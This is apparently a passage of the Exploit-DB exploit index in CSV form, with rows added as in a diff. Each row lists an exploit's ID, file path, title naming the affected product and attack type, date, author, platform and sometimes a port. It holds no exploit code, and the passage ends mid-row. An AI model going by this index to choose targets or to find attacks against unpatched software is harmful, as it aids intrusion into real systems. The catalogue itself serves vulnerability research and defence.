+25517,exploits/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload (Metasploit)",2013-05-17,Metasploit,remote,linux, +25526,exploits/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (2)",2005-04-25,kf,remote,linux, +25546,exploits/windows/remote/25546.txt,"BEA WebLogic Server 8.1 / WebLogic Express Administration Console - Cross-Site Scripting",2005-04-26,"Alexander Kornbrust",remote,windows, +25547,exploits/linux/remote/25547.pl,"Convert-UUlib 1.04/1.05 Perl Module - Remote Buffer Overflow",2005-04-26,CorryL,remote,linux, +25557,exploits/windows/remote/25557.txt,"HP OpenView Radia Management Portal 1.0/2.0 - Remote Command Execution",2005-04-28,"David Morgan",remote,windows, +25559,exploits/multiple/remote/25559.txt,"Oracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass",2005-04-28,"Alexander Kornbrust",remote,multiple, +25561,exploits/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache - Arbitrary File Corruption",2005-04-28,"Alexander Kornbrust",remote,multiple, +25562,exploits/multiple/remote/25562.txt,"Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",remote,multiple, +25563,exploits/multiple/remote/25563.txt,"Oracle Application Server 9i - Webcache PartialPageErrorPage Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",remote,multiple, +25571,exploits/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal",2005-05-02,"Donato Ferrante",remote,windows, +25572,exploits/windows/remote/25572.txt,"Video Cam Server 1.0 - Full Path Disclosure",2005-05-02,"Donato Ferrante",remote,windows, +25573,exploits/windows/remote/25573.txt,"Video Cam Server 1.0 - Administrative Interface Authentication Bypass",2005-05-02,"Donato Ferrante",remote,windows, +25574,exploits/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client - Remote Format String",2005-05-02,"Luigi Auriemma",remote,multiple, +25597,exploits/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",remote,windows, +25598,exploits/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",remote,osx, +25600,exploits/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",remote,windows, +25608,exploits/hardware/remote/25608.rb,"Linksys WRT160N v2 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-05-21,Metasploit,remote,hardware,80 +25609,exploits/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,remote,hardware,80 +25820,exploits/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - '.ASCII' File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,remote,linux, +25822,exploits/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",remote,windows, +25613,exploits/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",remote,multiple, +25621,exploits/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,remote,windows, +25624,exploits/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",remote,unix, +25625,exploits/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2)",2005-05-11,K-sPecial,remote,unix, +25626,exploits/osx/remote/25626.c,"4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",remote,osx, +25627,exploits/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,remote,php, +25643,exploits/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized '.JPEG' Image Access",2005-05-10,"Tirath Rai",remote,windows, +25646,exploits/windows/remote/25646.txt,"MyServer 0.8 - Cross-Site Scripting",2005-05-10,dr_insane,remote,windows, +25648,exploits/cgi/remote/25648.txt,"neteyes nexusway border gateway - Multiple Vulnerabilities",2005-05-11,pokley,remote,cgi, +25652,exploits/windows/remote/25652.txt,"APG Technology ClassMaster - Unauthorized Folder Access",2005-05-12,"Alex Garrett",remote,windows, +25669,exploits/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal",2005-05-16,"Claus R. F. Overbeck",remote,linux, +25670,exploits/multiple/remote/25670.html,"Mozilla Suite And Firefox - DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,remote,multiple, +25684,exploits/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",remote,hardware, +25687,exploits/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",remote,freebsd, +25691,exploits/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",remote,multiple, +25694,exploits/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",remote,windows, +25695,exploits/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting",2005-05-24,"Jamie Fisher",remote,windows, +25696,exploits/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting",2005-05-24,"Jamie Fisher",remote,windows, +25697,exploits/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Privilege Escalation",2005-05-24,"Oliver Karow",remote,windows, +25698,exploits/windows/remote/25698.txt,"Blue Coat Reporter 7.0/7.1 - License HTML Injection",2005-05-24,"Oliver Karow",remote,windows, +25706,exploits/linux/remote/25706.cpp,"GNU Mailutils 0.6 - Mail Email Header Buffer Overflow",2004-08-10,infamous41md,remote,linux, +25708,exploits/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server - Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",remote,multiple, +25710,exploits/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - 'Read_TCP_String' Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",remote,multiple, +25713,exploits/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution",2013-05-26,rgod,remote,windows, +25755,exploits/windows/remote/25755.txt,"ServersCheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,remote,windows, +33414,exploits/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,remote,php, +33415,exploits/php/remote/33415.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,remote,php, +33423,exploits/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - '/cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,remote,hardware, +25784,exploits/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",remote,windows, +25802,exploits/linux/remote/25802.txt,"C.J. Steele Tattle - Remote Command Execution",2005-06-07,b0iler,remote,linux, +25814,exploits/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,remote,windows, +25835,exploits/windows/remote/25835.html,"Logic Print 2013 - vTable Overwrite Stack Overflow",2013-05-30,h1ch4m,remote,windows, +25836,exploits/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,remote,windows, +25841,exploits/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",remote,windows, +25842,exploits/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",remote,multiple, +25851,exploits/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,remote,windows,8001 +26288,exploits/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",remote,linux, +25948,exploits/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,remote,windows, +25949,exploits/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x - Spoofed SIP Status Message Handling",2005-07-06,DrFrancky,remote,hardware, +25933,exploits/windows/remote/25933.txt,"WhitSoft SlimServe HTTPd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,remote,windows, +25944,exploits/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,remote,multiple, +25966,exploits/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",remote,hardware, +25970,exploits/linux/remote/25970.py,"Exim - 'sender_address' Remote Code Execution",2013-06-05,eKKiM,remote,linux, +25975,exploits/linux/remote/25975.rb,"MiniUPnPd 1.0 - Remote Stack Buffer Overflow Remote Code Execution (Metasploit)",2013-06-05,Metasploit,remote,linux,5555 +25979,exploits/windows/remote/25979.rb,"Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,remote,windows, +25980,exploits/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution (Metasploit)",2013-06-05,Metasploit,remote,multiple,8080 +25986,exploits/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Command Execution",2013-06-05,kingcope,remote,php, +25987,exploits/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",remote,hardware, +25988,exploits/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",remote,multiple, +25989,exploits/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",remote,windows, +25999,exploits/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)",2013-06-07,"Scott Bell",remote,windows, +26002,exploits/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",remote,multiple, +26003,exploits/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",remote,multiple, +26004,exploits/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",remote,multiple, +26006,exploits/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x - Unauthorized Report Execution",2005-07-19,"Alexander Kornbrust",remote,multiple, +26013,exploits/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",remote,multiple, +26022,exploits/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,remote,hardware, +26024,exploits/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",remote,linux, +26032,exploits/windows/remote/26032.html,"SPI Dynamics WebInspect 5.0.196 - Cross Application Script Injection",2005-07-26,QQLan@yandex.ru,remote,windows, +26035,exploits/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,remote,windows, +26044,exploits/windows/remote/26044.txt,"MDaemon 8.0 - Content Filter Directory Traversal",2005-07-27,"Tan Chew Keong",remote,windows, +26071,exploits/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting",2005-08-04,"Secunia Research",remote,multiple, +26332,exploits/multiple/remote/26332.txt,"Oracle 9 - XML DB Cross-Site Scripting",2005-10-07,"Alexander Kornbrust",remote,multiple, +26075,exploits/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,remote,hardware, +26299,exploits/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",remote,windows, +26101,exploits/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure",2005-08-05,anonymous,remote,linux, +40874,exploits/android/remote/40874.txt,"Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",remote,android, +26123,exploits/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,remote,multiple, +26134,exploits/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,remote,windows, +26135,exploits/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged 'toString()' Remote Code Execution (Metasploit)",2013-06-11,Metasploit,remote,multiple, +26151,exploits/windows/remote/26151.txt,"Isemarket JaguarControl - ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",remote,windows, +26152,exploits/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",remote,osx, +26167,exploits/windows/remote/26167.pl,"Microsoft Visual Studio .NET - 'msdds.dll' Remote Code Execution",2005-08-17,anonymous,remote,windows, +26168,exploits/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN 'Username' Enumeration",2005-08-18,"Roy Hills",remote,hardware, +26175,exploits/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)",2013-06-13,Metasploit,remote,windows, +26196,exploits/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,remote,windows, +26198,exploits/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 - HTTP CONNECT Unauthorized Access",2005-08-25,"Oliver Karow",remote,linux, +26210,exploits/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",remote,multiple, +26221,exploits/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure",2005-09-05,"Gregory R. Panakkal",remote,windows, +26230,exploits/windows/remote/26230.txt,"Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure",2005-09-04,"Inge Henriksen",remote,windows, +26306,exploits/windows/remote/26306.txt,"NateOn Messenger 3.0 - Arbitrary File Download / Buffer Overflow",2005-09-29,saintlinu,remote,windows, +26330,exploits/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept?p_t02' Cross-Site Scripting",2005-10-07,Red-Database-Security,remote,multiple, +26318,exploits/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,remote,hardware, +26329,exploits/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - 'f?p=' Cross-Site Scripting",2005-10-07,Red-Database-Security,remote,multiple, +26374,exploits/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",remote,windows, +26375,exploits/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",remote,windows, +26376,exploits/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character Cross-Site Scripting",2005-10-19,"Ziv Kamir",remote,windows, +26412,exploits/hardware/remote/26412.pl,"Seowonintech Devices - Remote Command Execution",2013-06-24,"Todor Donev",remote,hardware, +26419,exploits/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module - 'Username' Command Execution (Metasploit)",2013-06-24,Metasploit,remote,linux, +26420,exploits/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection (Metasploit)",2013-06-24,Metasploit,remote,windows,2381 +26421,exploits/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,remote,php, +26422,exploits/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,remote,linux, +26424,exploits/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",remote,windows, +26443,exploits/php/remote/26443.php,"PHP 4.x/5.0.x - Arbitrary File Upload GLOBAL Variable Overwrite",2005-10-31,rgod,remote,php, +26460,exploits/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow",2005-11-02,"Luigi Auriemma",remote,windows, +26464,exploits/windows/remote/26464.txt,"IPSwitch WhatsUp Small Business 2004 Report Service - Directory Traversal",2005-11-03,"Dennis Rand",remote,windows, +26471,exploits/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21 +26491,exploits/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting",2005-11-09,"Moritz Naumann",remote,windows, +26493,exploits/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",remote,windows, +26494,exploits/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",remote,windows, +26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,remote,windows, +26497,exploits/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,remote,windows, +26529,exploits/multiple/remote/26529.rb,"Java Applet - ProviderSkeleton Insecure Invoke Method (Metasploit)",2013-07-01,Metasploit,remote,multiple, +26531,exploits/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,remote,multiple, +26536,exploits/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,remote,linux, +26540,exploits/linux/remote/26540.txt,"Inkscape 0.41/0.42 - '.SVG' Image Buffer Overflow",2005-11-21,"Joxean Koret",remote,linux, +26542,exploits/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",remote,multiple, +26622,exploits/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,remote,php, +40386,exploits/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",remote,hardware,161 +26737,exploits/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force",2013-07-11,kingcope,remote,lin_x86, +26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80 +26741,exploits/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",remote,linux, +26768,exploits/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,remote,cgi, +26773,exploits/windows/remote/26773.txt,"LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access",2005-12-12,dr_insane,remote,windows, +26774,exploits/windows/remote/26774.txt,"LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access",2005-12-12,dr_insane,remote,windows, +26775,exploits/windows/remote/26775.txt,"LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,remote,windows, +26913,exploits/linux/remote/26913.c,"Info-ZIP UnZip 5.x - File Name Buffer Overflow",2005-12-19,DVDMAN,remote,linux, +26966,exploits/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",remote,multiple, +27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21 +27012,exploits/windows/remote/27012.rb,"Apple QuickTime 7 - Invalid Atom Length Buffer Overflow (Metasploit)",2013-07-22,Metasploit,remote,windows, +27013,exploits/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution (Metasploit)",2013-07-22,Metasploit,remote,windows, +27024,exploits/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,remote,windows, +27032,exploits/linux/remote/27032.txt,"Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution",2006-01-05,"Patrice Fournier",remote,linux, +27044,exploits/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution (Metasploit)",2013-07-23,Metasploit,remote,hardware, +27045,exploits/linux/remote/27045.rb,"Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)",2013-07-23,Metasploit,remote,linux,443 +27046,exploits/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload (Metasploit)",2013-07-23,Metasploit,remote,windows,443 +27072,exploits/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,remote,windows, +27073,exploits/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,remote,windows, +27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple, +27096,exploits/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple, +27133,exploits/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Remote Command Execution",2013-07-27,"Jacob Holcomb",remote,linux_mips, +27135,exploits/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,remote,multiple,8080 +27150,exploits/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",remote,linux, +27181,exploits/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",remote,multiple, +27182,exploits/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",remote,multiple, +27203,exploits/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",remote,hardware, +27233,exploits/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp?fullName' Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",remote,linux, +27234,exploits/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle?fullName' Arbitrary File Deletion",2006-02-15,"Leandro Meiners",remote,linux, +27235,exploits/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp?url' Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",remote,linux, +27244,exploits/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,remote,linux, +27271,exploits/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",remote,windows, +27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows, +27528,exploits/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)",2013-08-12,Metasploit,remote,hardware, +27293,exploits/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443 +27294,exploits/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443 +27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,unix,7443 +27319,exploits/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",remote,hardware, +27325,exploits/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",remote,windows, +27326,exploits/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,remote,linux, +27378,exploits/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",remote,windows, +27397,exploits/linux/remote/27397.txt,"Apache suEXEC - Information Disclosure / Privilege Escalation",2013-08-07,kingcope,remote,linux, +27400,exploits/windows/remote/27400.py,"HP Data Protector - Remote Command Execution",2013-08-07,"Alessandro Di Pinto & Claudio Moletta",remote,windows, +27401,exploits/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval",2013-08-07,Wireghoul,remote,windows, +27428,exploits/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,remote,hardware, +27429,exploits/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,remote,windows, +27452,exploits/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",remote,hardware, +27508,exploits/php/remote/27508.txt,"PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure",2006-03-29,Samuel,remote,php, +27523,exploits/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,remote,windows,21 +27526,exploits/windows/remote/27526.txt,"Oracle Java - 'storeImageArray()' Invalid Array Indexing",2013-08-12,"Packet Storm",remote,windows, +27527,exploits/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution (Metasploit)",2013-08-12,Metasploit,remote,multiple, +27529,exploits/php/remote/27529.rb,"OpenX - Backdoor PHP Code Execution (Metasploit)",2013-08-12,Metasploit,remote,php, +27530,exploits/multiple/remote/27530.rb,"Squash - YAML Code Execution (Metasploit)",2013-08-12,Metasploit,remote,multiple, +27554,exploits/windows/remote/27554.py,"MinaliC WebServer 2.0.0 - Remote Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,remote,windows,8080 +27555,exploits/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance - Login Buffer Overflow (Metasploit)",2013-08-13,Metasploit,remote,windows,13838 +27556,exploits/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload (Metasploit)",2013-08-13,Metasploit,remote,windows,8080 +27564,exploits/php/remote/27564.txt,"PHP 4.x/5.0/5.1 - PHPInfo Large Input Cross-Site Scripting",2006-04-03,"Maksymilian Arciemowicz",remote,php, +27565,exploits/windows/remote/27565.txt,"HP Color LaserJet 2500/4600 Toolbox - Directory Traversal",2006-04-03,"Richard Horsman",remote,windows, +27568,exploits/windows/remote/27568.py,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1)",2006-04-04,"Luigi Auriemma",remote,windows, +27569,exploits/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",remote,windows, +27577,exploits/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",remote,windows, +27595,exploits/php/remote/27595.txt,"PHP 4.x - 'tempnam() open_basedir' Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",remote,php, +27596,exploits/php/remote/27596.txt,"PHP 4.x - 'copy() Safe_Mode' Bypass",2006-04-10,"Maksymilian Arciemowicz",remote,php, +27806,exploits/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",remote,windows, +27606,exploits/windows/remote/27606.rb,"Intrasrv 1.0 - Remote Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80 +27607,exploits/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,windows,8000 +27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80 +27610,exploits/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File 